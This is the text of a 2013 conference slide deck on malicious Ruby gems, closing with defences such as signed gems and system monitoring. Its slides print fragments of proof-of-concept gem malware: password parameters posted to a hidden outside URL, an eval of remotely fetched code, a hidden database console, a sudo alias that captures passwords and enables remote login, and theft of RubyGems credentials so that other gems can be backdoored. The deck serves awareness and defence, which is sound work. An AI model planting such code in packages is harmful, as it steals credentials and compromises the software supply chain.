Tweet
Tweet

Slide 1

Slide 1 text

Hacking with Gems Benjamin Smith @benjamin_smith Friday, February 22, 13

Slide 2

Slide 2 text

How-to get rich quick and (maybe) not go to jail! Friday, February 22, 13

Slide 3

Slide 3 text

who i am Friday, February 22, 13

Slide 4

Slide 4 text

Friday, February 22, 13

Slide 5

Slide 5 text

Friday, February 22, 13

Slide 6

Slide 6 text

Friday, February 22, 13

Slide 7

Slide 7 text

Friday, February 22, 13

Slide 8

Slide 8 text

Friday, February 22, 13

Slide 9

Slide 9 text

what i am NOT Friday, February 22, 13

Slide 10

Slide 10 text

Friday, February 22, 13

Slide 11

Slide 11 text

please do not try this at home Friday, February 22, 13

Slide 12

Slide 12 text

please do not try this at home Friday, February 22, 13

Slide 13

Slide 13 text

how it all started GEM remote: https://rubygems.org/ specs: actionmailer (3.2.12) actionpack (= 3.2.12) mail (~> 2.4.4) actionpack (3.2.12) activemodel (= 3.2.12) activesupport (= 3.2.12) builder (~> 3.0.0) erubis (~> 2.7.0) ... Friday, February 22, 13

Slide 14

Slide 14 text

what’s the worst that could happen? Friday, February 22, 13

Slide 15

Slide 15 text

Friday, February 22, 13

Slide 16

Slide 16 text

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

Slide 17

Slide 17 text

before... github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

Slide 18

Slide 18 text

after! github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

Slide 19

Slide 19 text

some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

Slide 20

Slide 20 text

... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

Slide 21

Slide 21 text

?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

Slide 22

Slide 22 text

i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

Slide 23

Slide 23 text

i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

Slide 24

Slide 24 text

“development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

Slide 25

Slide 25 text

elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

Slide 26

Slide 26 text

profit • Step 1: do something • Step 2: do something else • Step 3: ???? • Step 4: profit Friday, February 22, 13

Slide 27

Slide 27 text

profit • Step 1: write a gem that does something • Step 2: • Step 3: • Step 4: Friday, February 22, 13

Slide 28

Slide 28 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: • Step 4: Friday, February 22, 13

Slide 29

Slide 29 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: Friday, February 22, 13

Slide 30

Slide 30 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit Friday, February 22, 13

Slide 31

Slide 31 text

profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country Friday, February 22, 13

Slide 32

Slide 32 text

a one way ticket to Friday, February 22, 13

Slide 33

Slide 33 text

that was easy. what else can I do? Friday, February 22, 13

Slide 34

Slide 34 text

gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 35

Slide 35 text

show me the hack Net::HTTP.post_form( #, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 36

Slide 36 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 37

Slide 37 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 38

Slide 38 text

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params) self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 39

Slide 39 text

...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 40

Slide 40 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 41

Slide 41 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 42

Slide 42 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 43

Slide 43 text

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 44

Slide 44 text

/users/sign_in github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 45

Slide 45 text

/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 46

Slide 46 text

hello db access! github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 47

Slide 47 text

SELECT * FROM users; github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 48

Slide 48 text

UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 49

Slide 49 text

CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

Slide 50

Slide 50 text

careful of wolves in sheep’s clothing Friday, February 22, 13

Slide 51

Slide 51 text

Little Snitch obdev.at/products/littlesnitch/index.html @benjamin_smith Friday, February 22, 13

Slide 52

Slide 52 text

profit • Step 1: • Step 2: • Step 3: • Step 4: • Step 5: Friday, February 22, 13

Slide 53

Slide 53 text

profit • Step 1: write a gem that does something • Step 2: • Step 3: • Step 4: • Step 5: Friday, February 22, 13

Slide 54

Slide 54 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5: Friday, February 22, 13

Slide 55

Slide 55 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5: Friday, February 22, 13

Slide 56

Slide 56 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: Friday, February 22, 13

Slide 57

Slide 57 text

profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country Friday, February 22, 13

Slide 58

Slide 58 text

i like the beach Friday, February 22, 13

Slide 59

Slide 59 text

that was easy. what else can I do? Friday, February 22, 13

Slide 60

Slide 60 text

gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

Slide 61

Slide 61 text

what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1 Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

Slide 62

Slide 62 text

Friday, February 22, 13

Slide 63

Slide 63 text

what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

Slide 64

Slide 64 text

better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0 8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

Slide 65

Slide 65 text

behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

Slide 66

Slide 66 text

what what github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

Slide 67

Slide 67 text

i can haz source github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

Slide 68

Slide 68 text

truth time • this gem doesn't actually work • but it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

Slide 69

Slide 69 text

so much code so little time • Step 1: write a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country Friday, February 22, 13

Slide 70

Slide 70 text

that was easy hard. what else can I do? (that's easier) Friday, February 22, 13

Slide 71

Slide 71 text

gem install be_truthy github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 72

Slide 72 text

what it does > true.should be_true > User.new.should be_true > User.new.should be_truthy github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 73

Slide 73 text

what it ACTUALLY does github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 74

Slide 74 text

github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 75

Slide 75 text

file tree looks ok github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 76

Slide 76 text

source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 77

Slide 77 text

but what was this? github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 78

Slide 78 text

I see no C github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 79

Slide 79 text

run the what file? Gem::Specification.new do |gem| ... gem.extensions = ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 80

Slide 80 text

there is no Rakefile github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 81

Slide 81 text

gem fetch vs gem install > gem fetch be_truthy > gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 82

Slide 82 text

the real file tree github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 83

Slide 83 text

the real file tree github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 84

Slide 84 text

what does the Rakefile do? github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 85

Slide 85 text

sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 86

Slide 86 text

File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 87

Slide 87 text

FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 88

Slide 88 text

fseventer fernlightning.com/doku.php?id=software:fseventer:start @benjamin_smith Friday, February 22, 13

Slide 89

Slide 89 text

what does "sudo" do now? github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 90

Slide 90 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 91

Slide 91 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 92

Slide 92 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 93

Slide 93 text

print "WARNING: Improper use of the sudo command ..." system "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 94

Slide 94 text

echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 95

Slide 95 text

/usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl . -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 96

Slide 96 text

Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 97

Slide 97 text

ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 98

Slide 98 text

take away: don't install ben's gems Friday, February 22, 13

Slide 99

Slide 99 text

Friday, February 22, 13

Slide 100

Slide 100 text

take away: use windows? Friday, February 22, 13

Slide 101

Slide 101 text

don't install ben's gems Friday, February 22, 13

Slide 102

Slide 102 text

how could I get you to install my gems? Friday, February 22, 13

Slide 103

Slide 103 text

what gems are trustworthy? Friday, February 22, 13

Slide 104

Slide 104 text

how can I add my code to already trusted gems? Friday, February 22, 13

Slide 105

Slide 105 text

back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 106

Slide 106 text

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem @benjamin_smith Friday, February 22, 13

Slide 107

Slide 107 text

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem @benjamin_smith Friday, February 22, 13

Slide 108

Slide 108 text

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem @benjamin_smith Friday, February 22, 13

Slide 109

Slide 109 text

now I own your gems github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 110

Slide 110 text

> git clone your-gem-repo ...add a little code... > rake build > gem push your-gem github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

Slide 111

Slide 111 text

do people trust your gems? Friday, February 22, 13

Slide 112

Slide 112 text

do people who install your gems have trustworthy gems? Friday, February 22, 13

Slide 113

Slide 113 text

Friday, February 22, 13

Slide 114

Slide 114 text

there’s still one problem Friday, February 22, 13

Slide 115

Slide 115 text

bootstrapping Friday, February 22, 13

Slide 116

Slide 116 text

being popular sucks Friday, February 22, 13

Slide 117

Slide 117 text

conferences Friday, February 22, 13

Slide 118

Slide 118 text

values Friday, February 22, 13

Slide 119

Slide 119 text

hamster Friday, February 22, 13

Slide 120

Slide 120 text

wbench Friday, February 22, 13

Slide 121

Slide 121 text

almost-sinatra Friday, February 22, 13

Slide 122

Slide 122 text

almost-rack Friday, February 22, 13

Slide 123

Slide 123 text

almost-rack-protection Friday, February 22, 13

Slide 124

Slide 124 text

social engineering Friday, February 22, 13

Slide 125

Slide 125 text

Friday, February 22, 13

Slide 126

Slide 126 text

5% adoption Friday, February 22, 13

Slide 127

Slide 127 text

so what happens now? Friday, February 22, 13

Slide 128

Slide 128 text

ruby gems goes down Friday, February 22, 13

Slide 129

Slide 129 text

heroku deploys go down Friday, February 22, 13

Slide 130

Slide 130 text

i go to the beach Friday, February 22, 13

Slide 131

Slide 131 text

so what now? Friday, February 22, 13

Slide 132

Slide 132 text

gem cert --build Friday, February 22, 13

Slide 133

Slide 133 text

gem install rails -P HighSecurity Friday, February 22, 13

Slide 134

Slide 134 text

bsmith$ gem install rails -P HighSecurity Fetching: activesupport-3.2.12.gem (100%) ERROR: While executing gem ... (Gem::Exception) Unsigned gem Friday, February 22, 13

Slide 135

Slide 135 text

sandboxing Friday, February 22, 13

Slide 136

Slide 136 text

github.com/rubygems/rubygems Friday, February 22, 13

Slide 137

Slide 137 text

tools to detect malicious code Friday, February 22, 13

Slide 138

Slide 138 text

private gem repos Friday, February 22, 13

Slide 139

Slide 139 text

do not try this at home Friday, February 22, 13

Slide 140

Slide 140 text

don't install gems you don't need to Friday, February 22, 13

Slide 141

Slide 141 text

pay attention to what your gems do Friday, February 22, 13

Slide 142

Slide 142 text

monitor your system Friday, February 22, 13

Slide 143

Slide 143 text

read the source Friday, February 22, 13

Slide 144

Slide 144 text

gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary @benjamin_smith Friday, February 22, 13

Slide 145

Slide 145 text

on install github.com/benjaminleesmith/coal-mine-canary @benjamin_smith Friday, February 22, 13

Slide 146

Slide 146 text

the results github.com/benjaminleesmith/coal-mine-canary @benjamin_smith Friday, February 22, 13

Slide 147

Slide 147 text

thank you! Friday, February 22, 13

Slide 148

Slide 148 text

questions? ideas? @benjamin_smith https://github.com/benjaminleesmith Friday, February 22, 13